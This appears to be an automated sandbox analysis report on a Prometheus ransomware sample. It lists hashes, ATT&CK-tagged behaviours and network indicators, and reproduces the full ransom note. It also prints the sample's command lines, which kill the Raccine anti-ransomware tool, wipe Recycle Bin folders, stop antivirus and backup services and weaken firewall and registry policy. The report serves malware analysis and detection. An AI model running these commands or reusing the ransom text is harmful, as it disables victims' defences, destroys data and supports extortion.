prometheus | 9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184

General

Target

dd4eb8aa3371b7fd821a7a9730c924cf.exe
Size

194KB
MD5

dd4eb8aa3371b7fd821a7a9730c924cf
SHA1

3e53f7bf7dcb8569aaf0f3a3bcf67bda4c01c054
SHA256

9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
SHA512

12e760a59377632548f41bbdb98941a04c7d32b5d084f70b23db702dbeabb1e7a489df6d03af40da977a463150e4d144641fbc4640037e8858897a0509c9f356

Score

10^/10

prometheus discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files. * Please note that files must not contain any valuable information. Do you really want to restore your files? 1) Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open website: http://sonarmsniko2lvfu.onion/?a=reg c) Register account d) Click Compose and write to us, our username: Prometheus, in message write Your Key Identifier (it is at the end of file) 2) Using a email Write to 3 emails address at once, in message write Your Key Identifier (it is at the end of file) : prometheushelp@mail.ch prometheushelp@airmail.cc Prometheus.help@protonmail.ch We recommend using 1 method via TOR browser to contact us. Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1. * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. *For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data! Key Identifier: PyytrfB7H3OzWakGbuz5RKeJXGWbIR4AmtIFc0gNvvrkjV6vEgJCkTwU1CUB0d28+OSJDMFt6R0NVZ5MGVtwTtfrbqp1wz+bvHDcHVdOW0604XpPcoyoizMxYL7bZMdn9IXA468J+S32cGuJkcGSDXiS1TmyJomJMqVeMzJujmGR2G6IJ062QWozDpml/gkxGLZWLfbLim5wnhagVimLg9hO0KerOz9MlUTihLeChciJekiwdq5f9IT0L8xXAhkMZ5wq+dMLVJlEKBwrmQixbFi+BrshTXVCjdf+kgtPuyd/KfERNdVosydWBeLTw/6iNGy1r//Sl47kWm2KVQTaLRMsFh+XRWBVb8HZButao4UImGaI9dmRp71F4+Kgql4oAgC5c/37z2Tkpg5GXKiE/mkpozLx05RiULxOctpX7ZPcB1KQPaBOVc7NW2kTGGwtrF7s/ZOEEox90Y69l7CP0jtzLh+keuLHXSMB2x+B7qKqG59/ucoWQRovdtazbG7ViREPi+ZGbFa+c5UcmDWb+6iA1garLBjUeuzcjA2rQx4mYmxkJ/ZHomdxJASIENqHIZfWw3oh1dJ7R95GG+LEPF/yu1DYf5zBWUSujAQeaI8AbbzlKy+7TfAS+xBLmom8fP9WXNUYLMaFjhd4EKdD5w3Reksurk71yAzZ1t7MFWc=

Emails

prometheushelp@mail.ch

prometheushelp@airmail.cc

Prometheus.help@protonmail.ch

URLs

https://privatlab.com/file

http://sonarmsniko2lvfu.onion/?a=reg

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files. * Please note that files must not contain any valuable information. Do you really want to restore your files? 1) Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open website: http://sonarmsniko2lvfu.onion/?a=reg c) Register account d) Click Compose and write to us, our username: Prometheus, in message write Your Key Identifier (it is at the end of file) 2) Using a email Write to 3 emails address at once, in message write Your Key Identifier (it is at the end of file) : prometheushelp@mail.ch prometheushelp@airmail.cc Prometheus.help@protonmail.ch We recommend using 1 method via TOR browser to contact us. Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1. * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. *For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data! Key Identifier: PyytrfB7H3OzWakGbuz5RKeJXGWbIR4AmtIFc0gNvvrkjV6vEgJCkTwU1CUB0d28+OSJDMFt6R0NVZ5MGVtwTtfrbqp1wz+bvHDcHVdOW0604XpPcoyoizMxYL7bZMdn9IXA468J+S32cGuJkcGSDXiS1TmyJomJMqVeMzJujmGR2G6IJ062QWozDpml/gkxGLZWLfbLim5wnhagVimLg9hO0KerOz9MlUTihLeChciJekiwdq5f9IT0L8xXAhkMZ5wq+dMLVJlEKBwrmQixbFi+BrshTXVCjdf+kgtPuyd/KfERNdVosydWBeLTw/6iNGy1r//Sl47kWm2KVQTaLRMsFh+XRWBVb8HZButao4UImGaI9dmRp71F4+Kgql4oAgC5c/37z2Tkpg5GXKiE/mkpozLx05RiULxOctpX7ZPcB1KQPaBOVc7NW2kTGGwtrF7s/ZOEEox90Y69l7CP0jtzLh+keuLHXSMB2x+B7qKqG59/ucoWQRovdtazbG7ViREPi+ZGbFa+c5UcmDWb+6iA1garLBjUeuzcjA2rQx4mYmxkJ/ZHomdxJASIENqHIZfWw3oh1dJ7R95GG+LEPF/yu1DYf5zBWUSujAQeaI8AbbzlKy+7TfAS+xBLmom8fP9WXNUYLMaFjhd4EKdD5w3Reksurk71yAzZ1t7MFWc=

Emails

prometheushelp@mail.ch

prometheushelp@airmail.cc

Prometheus.help@protonmail.ch

URLs

https://privatlab.com/file

http://sonarmsniko2lvfu.onion/?a=reg

Signatures

Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus

Blocklisted process makes network request 9 IoCs

Processes:

mshta.exe

flow	pid	process
35	11344	mshta.exe
36	11344	mshta.exe
37	11344	mshta.exe
39	11344	mshta.exe
41	11344	mshta.exe
43	11344	mshta.exe
45	11344	mshta.exe
46	11344	mshta.exe
47	11344	mshta.exe

Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 13 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	13	http://live.sysinternals.com/PsExec.exe

Drops startup file 1 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	dd4eb8aa3371b7fd821a7a9730c924cf.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

10452 icacls.exe
10444 icacls.exe
10460 icacls.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 icanhazip.com

pid	process
10452	icacls.exe
10444	icacls.exe
10460	icacls.exe

flow	ioc
30	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe

Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

15948 net.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

pid	process
15948	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
10396	taskkill.exe
7276	taskkill.exe
6976	taskkill.exe
10380	taskkill.exe
10244	taskkill.exe
6984	taskkill.exe
7092	taskkill.exe
7688	taskkill.exe
3776	taskkill.exe
10292	taskkill.exe
7784	taskkill.exe
7212	taskkill.exe
7044	taskkill.exe
10388	taskkill.exe
10316	taskkill.exe
10268	taskkill.exe
7932	taskkill.exe
10236	taskkill.exe
10116	taskkill.exe
10048	taskkill.exe
10168	taskkill.exe
10348	taskkill.exe
10328	taskkill.exe
10304	taskkill.exe
8164	taskkill.exe
2204	taskkill.exe
7760	taskkill.exe
8020	taskkill.exe
10404	taskkill.exe
10364	taskkill.exe
10340	taskkill.exe
8252	taskkill.exe
10144	taskkill.exe
10184	taskkill.exe
10356	taskkill.exe
10280	taskkill.exe
10256	taskkill.exe
7672	taskkill.exe
2208	taskkill.exe
10216	taskkill.exe
10200	taskkill.exe
10132	taskkill.exe
10084	taskkill.exe
10072	taskkill.exe
10024	taskkill.exe
10372	taskkill.exe
2672	taskkill.exe
10096	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

960 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

11336 PING.EXE

pid	process
960	reg.exe

pid	process
11336	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid	process
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
744	dd4eb8aa3371b7fd821a7a9730c924cf.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exenet.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Token: SeDebugPrivilege	3776	net.exe
Token: SeDebugPrivilege	10292	taskkill.exe
Token: SeDebugPrivilege	10316	taskkill.exe
Token: SeDebugPrivilege	10364	taskkill.exe
Token: SeDebugPrivilege	10348	taskkill.exe
Token: SeDebugPrivilege	10372	taskkill.exe
Token: SeDebugPrivilege	10356	taskkill.exe
Token: SeDebugPrivilege	10256	taskkill.exe
Token: SeDebugPrivilege	10280	taskkill.exe
Token: SeDebugPrivilege	10388	taskkill.exe
Token: SeDebugPrivilege	10268	taskkill.exe
Token: SeDebugPrivilege	10328	taskkill.exe
Token: SeDebugPrivilege	10304	taskkill.exe
Token: SeDebugPrivilege	10404	taskkill.exe
Token: SeDebugPrivilege	10024	taskkill.exe
Token: SeDebugPrivilege	10340	taskkill.exe
Token: SeDebugPrivilege	10048	taskkill.exe
Token: SeDebugPrivilege	10396	taskkill.exe
Token: SeDebugPrivilege	10132	taskkill.exe
Token: SeDebugPrivilege	10380	taskkill.exe
Token: SeDebugPrivilege	10216	taskkill.exe
Token: SeDebugPrivilege	10144	taskkill.exe
Token: SeDebugPrivilege	10184	taskkill.exe
Token: SeDebugPrivilege	10200	taskkill.exe
Token: SeDebugPrivilege	10236	taskkill.exe
Token: SeDebugPrivilege	10116	taskkill.exe
Token: SeDebugPrivilege	10084	taskkill.exe
Token: SeDebugPrivilege	10168	taskkill.exe
Token: SeDebugPrivilege	10096	taskkill.exe
Token: SeDebugPrivilege	10072	taskkill.exe
Token: SeDebugPrivilege	7044	taskkill.exe
Token: SeDebugPrivilege	7932	taskkill.exe
Token: SeDebugPrivilege	10244	taskkill.exe
Token: SeDebugPrivilege	6984	taskkill.exe
Token: SeDebugPrivilege	8252	taskkill.exe
Token: SeDebugPrivilege	8164	taskkill.exe
Token: SeDebugPrivilege	2204	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	7760	taskkill.exe
Token: SeDebugPrivilege	7784	taskkill.exe
Token: SeDebugPrivilege	7092	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	7672	taskkill.exe
Token: SeDebugPrivilege	7276	taskkill.exe
Token: SeDebugPrivilege	6976	taskkill.exe
Token: SeDebugPrivilege	7212	taskkill.exe
Token: SeDebugPrivilege	7688	taskkill.exe
Token: SeDebugPrivilege	10412	powershell.exe
Token: SeDebugPrivilege	15676	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid process

744 dd4eb8aa3371b7fd821a7a9730c924cf.exe
744 dd4eb8aa3371b7fd821a7a9730c924cf.exe
744 dd4eb8aa3371b7fd821a7a9730c924cf.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid process

744 dd4eb8aa3371b7fd821a7a9730c924cf.exe
744 dd4eb8aa3371b7fd821a7a9730c924cf.exe
744 dd4eb8aa3371b7fd821a7a9730c924cf.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	pid	process	target process
PID 744 wrote to memory of 3776	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 744 wrote to memory of 3776	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 744 wrote to memory of 3776	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 744 wrote to memory of 2308	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 744 wrote to memory of 2308	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 744 wrote to memory of 2308	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 744 wrote to memory of 960	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 744 wrote to memory of 960	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 744 wrote to memory of 960	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 744 wrote to memory of 708	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 744 wrote to memory of 708	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 744 wrote to memory of 708	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 744 wrote to memory of 1368	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 744 wrote to memory of 1368	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 744 wrote to memory of 1368	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 744 wrote to memory of 2084	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 744 wrote to memory of 2084	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 744 wrote to memory of 2084	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 744 wrote to memory of 3656	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 744 wrote to memory of 3656	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 744 wrote to memory of 3656	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 744 wrote to memory of 3044	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 744 wrote to memory of 3044	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 744 wrote to memory of 3044	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 744 wrote to memory of 2504	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 2504	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 2504	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 3796	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 3796	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 3796	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 2024	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 2024	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 2024	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 4088	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 4088	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 4088	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 1036	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 1036	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 1036	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 1296	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 1296	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 1296	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 2712	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2712	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2712	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3064	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 3064	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 3064	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 744 wrote to memory of 3920	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3920	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3920	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3068	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3068	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3068	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2220	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2220	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2220	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2616	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2616	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 2616	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 1184	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 1184	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 1184	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe
PID 744 wrote to memory of 3236	744	dd4eb8aa3371b7fd821a7a9730c924cf.exe	net.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe

C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:744

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
PID:3776

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:960

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:708

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:1368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:2084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
3⤵
PID:12264

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:3656

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:2504

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:3044

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:3796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
3⤵
PID:10928

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:2024

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:4088

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:3064

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:2712

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1296

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1036

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
2⤵
PID:3068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
3⤵
PID:4140

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
2⤵
PID:2616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:4100

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
PID:3852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
3⤵
PID:4560

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
2⤵
PID:4092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
3⤵
PID:4624
